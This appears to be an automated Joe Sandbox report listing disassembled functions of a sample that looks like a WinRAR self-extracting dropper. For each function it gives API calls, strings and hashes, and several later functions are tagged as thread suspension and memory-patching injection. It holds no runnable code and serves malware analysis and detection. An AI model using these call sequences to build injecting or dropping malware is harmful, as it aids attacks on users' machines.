NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 004D1056

Memory Dump Source

Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: FreeMemoryVirtual
String ID:
API String ID: 3963845541-0
Opcode ID: 50c05400395a03b20e06351691fae088d68361488e0ef6a240dc2bda2501699c
Instruction ID: 3cd09412aefe593d431108f44592f772c0f6e448ed39dc29f5e7d1df07b74fea
Opcode Fuzzy Hash: 50c05400395a03b20e06351691fae088d68361488e0ef6a240dc2bda2501699c
Instruction Fuzzy Hash: E5D0A97200420CBBCB00CB80DC05FEA77ACE704330F200389B928821C0EAB02A088BE5

Function 004DF11C Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f81396d29097eea4873f774319d7cc3e9b42b0bda2001242bb644105d1b2ab6
Instruction ID: 0869d0174583789ed42055ae73e587f08cdd3c9ddba986da3f1ae38dae155aae
Opcode Fuzzy Hash: 6f81396d29097eea4873f774319d7cc3e9b42b0bda2001242bb644105d1b2ab6
Instruction Fuzzy Hash: E2D0C9F4C093009EC700EF24D58492AFBF4AA96600F00A81DF888A3200D230D8489B66

Function 0040F34C Relevance: 70.6, APIs: 28, Strings: 12, Instructions: 650
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0040F351

Strings

__tmp_rar_sfx_access_check_%u, xrefs: 0040F570
STARTDLG, xrefs: 0040F369
tfB, xrefs: 0040F683
jB, xrefs: 0040F679
lB, xrefs: 0040F7A5
"%s"%s, xrefs: 0040F78A
LICENSEDLG, xrefs: 0040FB27
@, xrefs: 0040F66F
winrarsfxmappingfile.tmp, xrefs: 0040F645
-el -s2 "-d%s" "-p%s" "-sp%s", xrefs: 0040F62C
<, xrefs: 0040F668
2C, xrefs: 0040F60F

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: H_prolog
String ID: "%s"%s$-el -s2 "-d%s" "-p%s" "-sp%s"$2C$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$lB$tfB$winrarsfxmappingfile.tmp$jB
API String ID: 3519838083-846196756
Opcode ID: 61406df2615012d9e3db60e997fd6fce66c4b730de3811abe328324a049bd3c4
Instruction ID: 1738a3ab06a0cb19fef92cc5e8e1081d7c2227203200a283704730c506bb817e
Opcode Fuzzy Hash: 61406df2615012d9e3db60e997fd6fce66c4b730de3811abe328324a049bd3c4
Instruction Fuzzy Hash: 9622CFB1641258BAEB30FB619C82FEF3668AF01708F40407BF604B65D2D77D4A498B6D

Function 0040E51E Relevance: 61.7, APIs: 28, Strings: 7, Instructions: 418
windowfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0040E523
SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,00000800,?,00000000,75A45540,?,0040F300,?,00000003), ref: 0040E66E
_wcslen.LIBCMT ref: 0040E6A9
_wcslen.LIBCMT ref: 0040E6BE
_wcslen.LIBCMT ref: 0040E6E4
_memset.LIBCMT ref: 0040E6FA
GetFileAttributesW.KERNEL32(?), ref: 0040E72A
DeleteFileW.KERNEL32(?), ref: 0040E738
_wcscat.LIBCMT ref: 0040E7EE
_wcslen.LIBCMT ref: 0040E826
_realloc.LIBCMT ref: 0040E838
_wcscat.LIBCMT ref: 0040E852
_wcslen.LIBCMT ref: 0040E8CC
_wcscpy.LIBCMT ref: 0040E9EA
_wcsrchr.LIBCMT ref: 0040E9FA
_wcscpy.LIBCMT ref: 0040EA19
GetDlgItem.USER32(?,00000066), ref: 0040EA32
SendMessageW.USER32(00000000,00000143,00000000,%s.%d.tmp), ref: 0040EA51
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0040EA7D

Strings

%s.%d.tmp, xrefs: 0040E660, 0040E755, 0040EA18, 0040EA48, 0040EA5E
", xrefs: 0040E8A8
ProgramFilesDir, xrefs: 0040E944
<br>, xrefs: 0040E7E8
C:\Users\user\AppData\Roaming, xrefs: 0040E57C
\, xrefs: 0040E992
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040E91F

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _wcslen$File$AttributesMessageSend_wcscat_wcscpy$DeleteH_prologItem_memset_realloc_wcsrchr
String ID: "$%s.%d.tmp$<br>$C:\Users\user\AppData\Roaming$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$\
API String ID: 1677619958-75030017
Opcode ID: 8dbb4f1cd464f17588d91b3678b8e53e81d4e5a4485536f2209b7b2cb35c768c
Instruction ID: eb6df92c66f9458d4cb09cc0b8b2cf72f8974dad3a9eab0123ee51dd3de86d7f
Opcode Fuzzy Hash: 8dbb4f1cd464f17588d91b3678b8e53e81d4e5a4485536f2209b7b2cb35c768c
Instruction Fuzzy Hash: D9E141B1800259AADF20EB91DC45BEE7778BF04344F0448BBF605B31D1EB789A99CB58

Function 0040CFAA Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94
windowCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(00000068,00000000), ref: 0040CFBB
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,?,?,0040DFB1,00426854,004480E0,004480E0,00001000,?,00000000,?), ref: 0040CFE8
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0040CFF4
SendMessageW.USER32(00000000,000000C2,00000000,00426554), ref: 0040D003
SendMessageW.USER32(?,000000B1,05F5E100,05F5E100), ref: 0040D017
SendMessageW.USER32(?,0000043A,00000000,?), ref: 0040D02E
SendMessageW.USER32(?,00000444,00000001,0000005C), ref: 0040D069
SendMessageW.USER32(?,000000C2,00000000,?), ref: 0040D078
SendMessageW.USER32(?,000000B1,05F5E100,05F5E100), ref: 0040D080
SendMessageW.USER32(?,00000444,00000001,0000005C), ref: 0040D0A4
SendMessageW.USER32(?,000000C2,00000000,0042681C), ref: 0040D0B5

Strings

\, xrefs: 0040D027

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: MessageSend$ItemShowWindow
String ID: \
API String ID: 1207805008-2967466578
Opcode ID: 30376d48d85cc97e7a7770a64de7a32e446cc6ba43c6729db23d4082a341df7f
Instruction ID: f7650883e2410028dd2462a2b3370e1b98169fb48f2bdcd5e5cef2d2a29d4cbf
Opcode Fuzzy Hash: 30376d48d85cc97e7a7770a64de7a32e446cc6ba43c6729db23d4082a341df7f
Instruction Fuzzy Hash: A5319FB1E4025CBAEB219BA1DC4AFAE7F79EB81714F204169F214BA1E0C7B51D01DF58

Function 0040B8D9 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 241
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0040B8DE
_wcschr.LIBCMT ref: 0040B8F5
_wcsrchr.LIBCMT ref: 0040B91D
_wcscpy.LIBCMT ref: 0040B933
_malloc.LIBCMT ref: 0040BABA

Part of subcall function 00408B00: GetLastError.KERNEL32(?,00000000,?,00000001), ref: 00408B40

_strncmp.LIBCMT ref: 0040B9E6
_strncmp.LIBCMT ref: 0040BA42
_malloc.LIBCMT ref: 0040BAF0

Strings

*messages***, xrefs: 0040BA12
*messages***, xrefs: 0040B9E0
a, xrefs: 0040BA29

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _malloc_strncmp$ErrorH_prologLast_wcschr_wcscpy_wcsrchr
String ID: *messages***$*messages***$a
API String ID: 1282893500-1639468518
Opcode ID: 3914abc9277c311b581f1b3b7c9b5ba6f605ed2e35b78b3275249a2a30594faa
Instruction ID: 09ad2670b8bc28ceb4fbae69c622eeb1207a7e22057d47210ddbd4b38e916631
Opcode Fuzzy Hash: 3914abc9277c311b581f1b3b7c9b5ba6f605ed2e35b78b3275249a2a30594faa
Instruction Fuzzy Hash: 8D81F0B1A002059BDB24EB64CC81FAA77B4EF10354F10417FE695B72D5DB78AA84CA8D

Function 0041CB5A Relevance: 16.6, APIs: 11, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fast_error_exit.LIBCMT ref: 0041CBD4
_fast_error_exit.LIBCMT ref: 0041CBE5
__RTC_Initialize.LIBCMT ref: 0041CBEB
__amsg_exit.LIBCMT ref: 0041CBFE
___crtGetEnvironmentStringsA.LIBCMT ref: 0041CC0F
__amsg_exit.LIBCMT ref: 0041CC24
__setenvp.LIBCMT ref: 0041CC2A
__amsg_exit.LIBCMT ref: 0041CC35
__cinit.LIBCMT ref: 0041CC3C
__amsg_exit.LIBCMT ref: 0041CC47
__wincmdln.LIBCMT ref: 0041CC4D

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: __amsg_exit$_fast_error_exit$EnvironmentInitializeStrings___crt__cinit__setenvp__wincmdln
String ID:
API String ID: 4269402829-0
Opcode ID: f91dcd0fd42e64313f3fba2d0419506ea4ba2f1cd06083854035faa7acef6fac
Instruction ID: 883fb3c980f4813e5c436b5cf12726f04a294531e72352cfac5452c5fc103bbc
Opcode Fuzzy Hash: f91dcd0fd42e64313f3fba2d0419506ea4ba2f1cd06083854035faa7acef6fac
Instruction Fuzzy Hash: 1E31CD71A8431499DB2477B2BD87BEE66B45F10718F10441FF505AB1C2EABC9DC08B5D

Function 0040747F Relevance: 16.5, APIs: 2, Strings: 7, Instructions: 754COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00407484

Part of subcall function 004181AF: _wcscpy.LIBCMT ref: 004182A1

_memcmp.LIBCMT ref: 00407A2D

Part of subcall function 0040C05E: LoadStringW.USER32(?,-0042E789,00000200), ref: 0040C0AF
Part of subcall function 0040C05E: LoadStringW.USER32(?,-0042E789,00000200), ref: 0040C0C1

Part of subcall function 0040DF6E: GetLastError.KERNEL32(?,0042E76C,004063D7,00000000,%ls,?,?,00000400,?,00000000,?), ref: 0040DF83
Part of subcall function 0040DF6E: __vswprintf_c_l.LIBCMT ref: 0040DFA1

Strings

E, xrefs: 00407E03
lB, xrefs: 00407A5A
lB, xrefs: 00407994
lB, xrefs: 00407797
lB, xrefs: 00407DDA
lB, xrefs: 004077BA
lB, xrefs: 004074CD

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: LoadString$ErrorH_prologLast__vswprintf_c_l_memcmp_wcscpy
String ID: E$lB$lB$lB$lB$lB$lB
API String ID: 1502584966-2948937983
Opcode ID: 91022f5f61e587b8289916d826e93972d45bc65a3e7724069360aa181ab8e7af
Instruction ID: fd818395ae649b4659bce74796ff2bdd81b87cfc9f7dd8f50251040ea6006d7f
Opcode Fuzzy Hash: 91022f5f61e587b8289916d826e93972d45bc65a3e7724069360aa181ab8e7af
Instruction Fuzzy Hash: 3B62E970D08645ADEF25DF64C8447EB7BE59F01304F0881BFE9496A2C2C77D6A88C76A

Function 0040ED89 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 0040EE19
_wcscpy.LIBCMT ref: 0040EE38
_wcschr.LIBCMT ref: 0040EE46
_wcscpy.LIBCMT ref: 0040EE66
_wcscpy.LIBCMT ref: 0040EEF0
_wcscpy.LIBCMT ref: 0040EFA8
_wcscpy.LIBCMT ref: 0040F025

Part of subcall function 00410823: _wcsncpy.LIBCMT ref: 0041083A

Strings

", xrefs: 0040EE1E
.lnk, xrefs: 0040EFE8, 0040EFF8

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _wcscpy$_wcschr_wcsncpy
String ID: "$.lnk
API String ID: 1398637911-4024015082
Opcode ID: f89d43da02553aa40f8154c18aabd13592f85f0ea484d7a09cca45d8928ed449
Instruction ID: cda6ec5b1dd6c0b3a399dff9c64bd740c8c36fdf19c023657f117b40d275632f
Opcode Fuzzy Hash: f89d43da02553aa40f8154c18aabd13592f85f0ea484d7a09cca45d8928ed449
Instruction Fuzzy Hash: 4491437280022D99DF25EB91CC45EEE73BCBF44304F0405ABE209F7181EB789AD48B99

Function 0040E139 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0040E156
_memset.LIBCMT ref: 0040E171
_wcscpy.LIBCMT ref: 0040E277
_wcscat.LIBCMT ref: 0040E284
ShowWindow.USER32(00000000,00000000,00000000,?,?,?), ref: 0040E2F1
CloseHandle.KERNEL32(?,?,000007D0,?,?,?), ref: 0040E33C
ShowWindow.USER32(00000000,00000001), ref: 0040E396

Strings

.exe, xrefs: 0040E262, 0040E282, 0040E348
.inf, xrefs: 0040E21D

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: ShowWindow$CloseHandle_memset_wcscat_wcscpy_wcslen
String ID: .exe$.inf
API String ID: 432946620-3750412487
Opcode ID: 194fad1b06da3ecb32decb044404a10563abff4bab8ac6c38c74bf44d86ea1d4
Instruction ID: c3944ab9c1e47af241af76b9de23f276a32abf7a3753ac83168d7aa016d66a71
Opcode Fuzzy Hash: 194fad1b06da3ecb32decb044404a10563abff4bab8ac6c38c74bf44d86ea1d4
Instruction Fuzzy Hash: 2C61C571900358AAEF21ABA6D8447AE7BB8AF41304F04487FE941B72E1D77D49A5CB48

Function 02291BA9 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58
threadsleepinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenThread.KERNEL32(001FFFFF,00000000,?,00000000,?), ref: 02291BC9
Wow64SuspendThread.KERNEL32(00000000), ref: 02291BDB
ResumeThread.KERNEL32(00000000), ref: 02291C0B
Sleep.KERNEL32(00000064), ref: 02291C18
SuspendThread.KERNEL32(00000000), ref: 02291C1F
Wow64GetThreadContext.KERNEL32(00000000,00010001), ref: 02291C2E
CloseHandle.KERNEL32(00000000), ref: 02291C3B

Strings

kL, xrefs: 02291BB2

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: Thread$SuspendWow64$CloseContextHandleOpenResumeSleep
String ID: kL
API String ID: 151076144-2496334608
Opcode ID: 1cced7e78016f8efb38b6fd067d1112067d9c369acabe07c3d34fa697e2de684
Instruction ID: 1a22e4eb9fccf5a0f288906f7424abbd24c4c6960b6d3b0f8f271b27c56e1d80
Opcode Fuzzy Hash: 1cced7e78016f8efb38b6fd067d1112067d9c369acabe07c3d34fa697e2de684
Instruction Fuzzy Hash: 1111E231E4062AABCB01DFE5EC8C7A973A8AF04725F000A90E819D2180D7708A61CB91

Function 02291F17 Relevance: 13.7, APIs: 9, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02291AC1: RtlInitializeCriticalSection.NTDLL(022E4050), ref: 02291AD1
Part of subcall function 02291AC1: RtlEnterCriticalSection.NTDLL(022E4050), ref: 02291AF6

RtlLeaveCriticalSection.NTDLL(022E4050), ref: 022920D9

Part of subcall function 02291C53: GetCurrentThread.KERNEL32 ref: 02291C7C
Part of subcall function 02291C53: GetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291C7F
Part of subcall function 02291C53: GetCurrentThread.KERNEL32 ref: 02291C8B
Part of subcall function 02291C53: SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291C8E
Part of subcall function 02291C53: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291C94
Part of subcall function 02291C53: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291C9D
Part of subcall function 02291C53: Thread32First.KERNEL32(00000000,?), ref: 02291CC7
Part of subcall function 02291C53: GetCurrentProcessId.KERNEL32 ref: 02291CD5
Part of subcall function 02291C53: GetCurrentThreadId.KERNEL32 ref: 02291CE1
Part of subcall function 02291C53: Thread32Next.KERNEL32(00000000,0000001C), ref: 02291CFC
Part of subcall function 02291C53: Thread32First.KERNEL32(00000000,0000001C), ref: 02291D3E
Part of subcall function 02291C53: GetCurrentProcessId.KERNEL32 ref: 02291D50
Part of subcall function 02291C53: GetCurrentThreadId.KERNEL32 ref: 02291D5C
Part of subcall function 02291C53: Thread32Next.KERNEL32(00000000,0000001C), ref: 02291D97

Part of subcall function 02291DE2: GetSystemInfo.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,02291FA0,00000000,?), ref: 02291E2D
Part of subcall function 02291DE2: VirtualQuery.KERNEL32(?,?,0000001C,?,00000000,?,?,?,?,?,?,?,?,02291FA0,00000000,?), ref: 02291E55
Part of subcall function 02291DE2: VirtualAlloc.KERNEL32(?,0000006C,00003000,00000020), ref: 02291E90

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,022910D9,022E3FC0,022910D9), ref: 02291FAE
VirtualProtectEx.KERNEL32(00000000,00000000,00000000,00000040,00000000), ref: 02291FCE
VirtualProtectEx.KERNEL32(00000000,00000000,0000006C,00000040,00000000), ref: 02291FE7
FlushInstructionCache.KERNEL32(?,0000000C,-0000000C), ref: 02292053
FlushInstructionCache.KERNEL32(?,0000002C,00000000), ref: 0229207B
VirtualProtectEx.KERNEL32(?,00000000,0000006C,00000000,00000000), ref: 0229208E
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 02292097
VirtualProtectEx.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 022920A9

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: Current$ThreadVirtual$ProcessProtectThread32$CacheCriticalFlushInstructionSection$FirstNextPriority$AllocCreateEnterInfoInitializeLeaveQuerySnapshotSystemToolhelp32
String ID:
API String ID: 771826910-0
Opcode ID: ecf279583399344bdcee95740a70b0ffd393cd11ed94f9ce18fcf11f73abc6c8
Instruction ID: d8c66434fff5f82c2ed2fa6a1b7732cc339a180d64f4e3a658c252c353ad88f1
Opcode Fuzzy Hash: ecf279583399344bdcee95740a70b0ffd393cd11ed94f9ce18fcf11f73abc6c8
Instruction Fuzzy Hash: BB51B13151430AAFDB21DFA59C84E6FBBEDEF88700F00491DF98992148DB34D955CB62

Function 02291AFE Relevance: 12.0, APIs: 8, Instructions: 37
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 02291B07
GetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291B0A
GetCurrentThread.KERNEL32 ref: 02291B14
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291B17
ResumeThread.KERNEL32(022E446C,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291B2F
CloseHandle.KERNEL32(022E446C,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291B3D
GetCurrentThread.KERNEL32 ref: 02291B67
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291B6A

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: Thread$CurrentPriority$CloseHandleResume
String ID:
API String ID: 3872315302-0
Opcode ID: 92c49105eb637d7c00ce5b397a55be25ce90c34b9e5e4b43a8314155d14a4508
Instruction ID: 53ef6bd7489dadb1e2e76f71da87e7c7758bc2875096f2dc4f2181c7e436b7a3
Opcode Fuzzy Hash: 92c49105eb637d7c00ce5b397a55be25ce90c34b9e5e4b43a8314155d14a4508
Instruction Fuzzy Hash: 71F0C932E90114DFCB12BBE5F80CE197B79FF88766F014CA5E1458A011CB359826DB60

Function 0229F78C Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 0229F7C9
dllmain_crt_dispatch.LIBCMT ref: 0229F7E0
dllmain_raw.LIBCMT ref: 0229F828
dllmain_crt_dispatch.LIBCMT ref: 0229F83B
